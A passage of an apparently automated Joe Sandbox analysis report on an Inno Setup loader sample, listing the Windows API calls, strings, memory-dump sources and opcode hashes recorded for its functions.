                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                • String ID:
                                                                                • API String ID: 2441996862-0
                                                                                • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                                                • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                                                • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                                                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModulePolicyProcess
                                                                                • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                • API String ID: 3256987805-3653653586
                                                                                • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • SetLastError.KERNEL32 ref: 0040A0F4
                                                                                  • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,020815C0), ref: 0040966C
                                                                                • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                • SetWindowLongA.USER32(000203BE,000000FC,00409918), ref: 0040A148
                                                                                • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                • 73EA5CF0.USER32(000203BE,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                                                • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                • API String ID: 3341979996-3001827809
                                                                                • Opcode ID: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                                                • Instruction ID: a1ec2b29f79e5ff862fc4fad7e4f310b8339f10a1453332cc6b7faa73b6a426b
                                                                                • Opcode Fuzzy Hash: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                                                • Instruction Fuzzy Hash: C2411F71600205DFD710EBA9EE8AB9977A4EB45304F10467EF514B73E2CBB8A811CB9D

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                • API String ID: 1646373207-2130885113
                                                                                • Opcode ID: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                                • Instruction ID: 4a4222b704d734fa8d0781b40c04fe9f9c76e7b4f133337d95099c0c8a01123f
                                                                                • Opcode Fuzzy Hash: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                                • Instruction Fuzzy Hash: 20017170748342AEFB00BB72DD4AB163A68E785704F50457BF5407A2D3DABD4C04DA6D

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                • SetWindowLongA.USER32(000203BE,000000FC,00409918), ref: 0040A148
                                                                                  • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                                                  • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020815C0,00409A90,00000000,00409A77), ref: 00409A14
                                                                                  • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020815C0,00409A90,00000000), ref: 00409A28
                                                                                  • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                  • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                  • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020815C0,00409A90), ref: 00409A5C
                                                                                • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                • 73EA5CF0.USER32(000203BE,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                • API String ID: 978128352-3001827809
                                                                                • Opcode ID: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                                                • Instruction ID: f39d198f6ca78f9e57da3cbf677d536b45cc778db879de651171db1d1b5627bc
                                                                                • Opcode Fuzzy Hash: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                                                • Instruction Fuzzy Hash: 07411A71604204DFD714EBA9EE86B5A77A4EB49304F10427EE514B73E1CBB8A810CB9D

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020815C0,00409A90,00000000,00409A77), ref: 00409A14
                                                                                • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020815C0,00409A90,00000000), ref: 00409A28
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020815C0,00409A90), ref: 00409A5C
                                                                                  • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,020815C0), ref: 0040966C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                • String ID: D
                                                                                • API String ID: 3356880605-2746444292
                                                                                • Opcode ID: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                                                • Instruction ID: 6ea97129cf5aa135a7f7046e3a99eae43c862e8aca722617c6144c18eae127a8
                                                                                • Opcode Fuzzy Hash: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                                                • Instruction Fuzzy Hash: 3A1142B17442486EDB10EBE68C42FAEB7ACEF49714F50017BB604F72C2DA785D048A69

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Message
                                                                                • String ID: .tmp$y@
                                                                                • API String ID: 2030045667-2396523267
                                                                                • Opcode ID: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                                                • Instruction ID: eba11cc0b212557bcf85e4c41764595d0d3f2f842990b0293eb01d0c1562b25b
                                                                                • Opcode Fuzzy Hash: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                                                • Instruction Fuzzy Hash: 9841BD30600200DFC711EF25DE96A5A77A5EB49304B50463AF804B73E2CBB9AC05CBED

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Message
                                                                                • String ID: .tmp$y@
                                                                                • API String ID: 2030045667-2396523267

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: CreateDirectoryErrorLast
                                                                                • String ID: .tmp
                                                                                • API String ID: 1375471231-2986845003

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                Similarity
                                                                                • API ID: ErrorLibraryLoadMode
                                                                                • String ID:
                                                                                • API String ID: 2987862817-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                Similarity
                                                                                • API ID: ErrorLast$FilePointer
                                                                                • String ID:
                                                                                • API String ID: 1156039329-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                Similarity
                                                                                • API ID: ErrorFileLastRead
                                                                                • String ID:
                                                                                • API String ID: 1948546556-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                                Similarity
                                                                                • API ID: ErrorLast$FilePointer
                                                                                • String ID:
                                                                                • API String ID: 1156039329-0
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                Similarity
                                                                                • API ID: Virtual$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 2087232378-0
                                                                                APIs
                                                                                • GetSystemDefaultLCID.KERNEL32(00000000,004053A6), ref: 0040528F
                                                                                  • Part of subcall function 00404CCC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CE9
                                                                                  • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                Similarity
                                                                                • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                • String ID:
                                                                                • API String ID: 1658689577-0
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
Memory Dump Source
• Source File: 00000000.00000002.3335522150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3335492887.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3335679403.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3335706085.0000000000411000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N6jsQ3XNNX.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
• Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
• Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
• Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
APIs
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
Similarity
• API ID: ErrorFileLastWrite
• String ID:
• API String ID: 442123175-0
• Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
• Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
• Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
• Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
APIs
• FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
Similarity
• API ID: FormatMessage
• String ID:
• API String ID: 1306739567-0
• Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
• Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
• Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
• Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
APIs
• SetEndOfFile.KERNEL32(?,02094000,0040A08C,00000000), ref: 004076B3
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020703AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
Similarity
• API ID: ErrorFileLast
• String ID:
• API String ID: 734332943-0
• Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
• Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
• Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
• Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
APIs
• SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
• Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
• Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
• Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
APIs
• SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
• Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
• Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
• Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
APIs
• CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
Similarity
• API ID: CharPrev
• String ID:
• API String ID: 122130370-0
• Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
• Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
• Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
• Instruction Fuzzy Hash:
APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
• Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
• Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
• Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
APIs
• VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
• Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
• Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
• Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
APIs
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
• Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
• Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
• Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
APIs
• VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
• Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
• Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
• Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
APIs
• GetCurrentProcess.KERNEL32(00000028), ref: 00409457
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
• GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
• ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
Strings
Similarity
• API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 107509674-3733053543
• Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
• Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
• Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
• Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
APIs
• FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
• SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
• LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
• LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID:
                                                                                • API String ID: 3473537107-0
                                                                                • Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                                • Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
                                                                                • Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                                • Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
                                                                                APIs
